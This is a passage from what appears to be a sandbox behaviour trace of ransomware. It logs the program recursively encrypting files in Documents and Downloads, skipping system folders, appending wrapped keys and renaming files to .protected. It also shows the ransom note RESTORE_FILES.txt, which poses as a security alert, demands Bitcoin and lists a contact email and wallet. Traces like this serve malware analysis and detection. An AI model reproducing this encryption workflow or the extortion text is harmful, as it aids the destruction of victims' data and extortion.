lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.643] CloseHandle (hObject=0xb4) returned 1 [0091.644] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx.protected") returned 76 [0091.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yiizhveyce2tieuqq.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yiizhveyce2tieuqq.pptx.protected")) returned 1 [0091.644] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.644] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="Windows") returned 1 [0091.644] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="Program Files") returned 1 [0091.645] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="Program Files (x86)") returned 1 [0091.645] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="$Recycle.bin") returned 1 [0091.645] lstrcmpiW (lpString1="Zn0 I.pptx", lpString2="System Volume Information") returned 1 [0091.645] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx") returned 54 [0091.645] StrStrIW (lpFirst="Zn0 I.pptx", lpSrch=".protected") returned 0x0 [0091.645] lstrcmpW (lpString1="Zn0 I.pptx", lpString2="RESTORE_FILES.txt") returned 1 [0091.645] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.645] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zn0 i.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx") returned 54 [0091.645] StrStrW (lpFirst="Zn0 I.pptx", lpSrch=".txt") returned 0x0 [0091.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx") returned 54 [0091.645] StrStrW (lpFirst="Zn0 I.pptx", lpSrch=".rar") returned 0x0 [0091.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx") returned 54 [0091.645] StrStrW (lpFirst="Zn0 I.pptx", lpSrch=".zip") returned 0x0 [0091.645] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.646] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.646] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.646] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.646] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.646] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.646] CloseHandle (hObject=0xb4) returned 1 [0091.647] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx.protected") returned 64 [0091.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zn0 i.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zn0 I.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zn0 i.pptx.protected")) returned 1 [0091.648] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="Windows") returned -1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="Program Files") returned -1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="Program Files (x86)") returned -1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="$Recycle.bin") returned 1 [0091.648] lstrcmpiW (lpString1="_WuxhMS.pptx", lpString2="System Volume Information") returned -1 [0091.648] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx") returned 56 [0091.648] StrStrIW (lpFirst="_WuxhMS.pptx", lpSrch=".protected") returned 0x0 [0091.648] lstrcmpW (lpString1="_WuxhMS.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.648] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.648] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_wuxhms.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.649] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx") returned 56 [0091.649] StrStrW (lpFirst="_WuxhMS.pptx", lpSrch=".txt") returned 0x0 [0091.649] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx") returned 56 [0091.649] StrStrW (lpFirst="_WuxhMS.pptx", lpSrch=".rar") returned 0x0 [0091.649] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx") returned 56 [0091.649] StrStrW (lpFirst="_WuxhMS.pptx", lpSrch=".zip") returned 0x0 [0091.649] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.650] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.650] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.650] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.650] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.650] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.650] CloseHandle (hObject=0xb4) returned 1 [0091.650] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx.protected") returned 66 [0091.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_wuxhms.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_WuxhMS.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_wuxhms.pptx.protected")) returned 1 [0091.651] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.651] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.651] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RESTORE_FILES.txt") returned 61 [0091.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.665] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.665] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.666] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.666] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.666] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.667] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0091.667] CloseHandle (hObject=0xa4) returned 1 [0091.667] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="Windows") returned -1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="Program Files") returned -1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="Program Files (x86)") returned -1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="$Recycle.bin") returned 1 [0091.667] lstrcmpiW (lpString1="Downloads", lpString2="System Volume Information") returned -1 [0091.667] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned 43 [0091.667] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0091.667] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0091.667] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*") returned 45 [0091.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.667] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.668] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.668] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.668] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.668] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.668] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\.") returned 45 [0091.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.668] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.668] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.668] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.668] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.671] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.671] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.671] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.671] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.671] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.671] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.671] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\..") returned 46 [0091.671] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.671] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.671] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.671] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.671] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.671] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.671] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.671] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0091.671] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.671] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.671] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.671] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.672] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0091.672] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.672] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0091.672] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.672] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0091.672] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.672] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0091.673] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.673] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0091.673] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.673] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.674] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.674] CloseHandle (hObject=0xb4) returned 1 [0091.674] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.protected") returned 65 [0091.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.protected")) returned 1 [0091.675] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0091.675] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0091.675] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\RESTORE_FILES.txt") returned 61 [0091.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0091.692] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.692] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0091.692] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.693] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0091.693] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.693] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0091.693] CloseHandle (hObject=0xa4) returned 1 [0091.693] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0091.693] lstrcmpiW (lpString1="Favorites", lpString2="System Volume Information") 